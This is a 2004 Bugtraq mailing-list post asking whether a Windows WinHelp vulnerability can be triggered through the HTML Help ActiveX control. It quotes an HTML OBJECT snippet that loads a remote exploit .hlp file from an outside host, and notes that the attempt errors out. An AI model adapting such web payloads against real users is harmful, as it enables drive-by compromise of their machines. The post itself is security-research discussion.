New Winhlp32.exe vuln

bad_son_at_pimp.it
Date: 12/25/04

  • Next message: Brett Glass: "Re: Microsoft Windows LoadImage API Integer Buffer overflow"
    Date: Fri, 24 Dec 2004 18:53:52 -0500 (EST)
    To: <bugtraq@securityfocus.com>
    
    

    Can this vulnerability be exploited using the HTML help ActiveX control ?

    I am trying:
    <OBJECT
       id=winhelp
       type="application/x-oleobject"
       classid="clsid:adb880a6-d8ff-11cf-9377-00aa003b7a11"
       codebase="hhctrl.ocx#Version=5,02,3790,1194"
       width=100
       height=100
    >
       <PARAM name="Command" value="WinHelp">
       <PARAM name="Button" value="Text:Exploit">
       <PARAM name="Item1"
    value="http://www.xfocus.net/flashsky/icoExp/search.hlp">MyWindow">

    </OBJECT>

    However, i get an error "This operation is allowed only within HTML help" ?

    Is this approach wrong ?


  • Next message: Brett Glass: "Re: Microsoft Windows LoadImage API Integer Buffer overflow"

    Relevant Pages